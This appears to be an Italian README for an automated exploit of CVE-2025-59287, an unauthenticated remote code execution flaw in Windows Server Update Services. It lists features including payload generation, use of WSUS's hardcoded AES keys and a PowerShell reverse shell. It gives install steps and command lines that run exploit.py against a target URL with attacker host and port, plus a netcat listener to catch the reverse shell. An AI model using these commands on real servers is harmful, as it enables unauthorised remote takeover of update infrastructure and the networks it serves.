
# Exploit automatizzato per CVE-2025-59287, una RCE non autenticata in WSUS, con generazione di payload, listener per reverse shell e crittografia AES con chiavi hardcoded.
Exploit automatizzato per la vulnerabilità di esecuzione remota di codice non autenticata in Windows Server Update Services (WSUS).
✅ Generazione automatica del payload
✅ Download automatico della dipendenza ysoserial.NET
✅ Listener integrato per reverse shell
✅ Supporto multipiattaforma (Windows/Linux/Mac)
✅ Crittografia AES con chiavi hardcoded di WSUS
✅ Payload PowerShell per reverse shell
pip install -r requirements.txt
sudo apt install wine-stable
sudo apt install mono-complete
Clona o scarica i file dell'exploit
cd CVE-2025-59287-exploit
Esegui l'exploit (scarica automaticamente ysoserial.NET)
python3 exploit.py -u http://target:8530 -lhost YOUR_IP -lport 4444
python3 exploit.py -u http://192.168.1.100:8530 -lhost 10.10.14.5 -lport 4444
Terminale 1: Avvia il listener netcat
nc -lvnp 4444
Terminale 2: Esegui l'exploit senza listener integrato
python3 exploit.py -u http://target:8530 -lhost 10.10.14.5 -lport 4444 --no-listener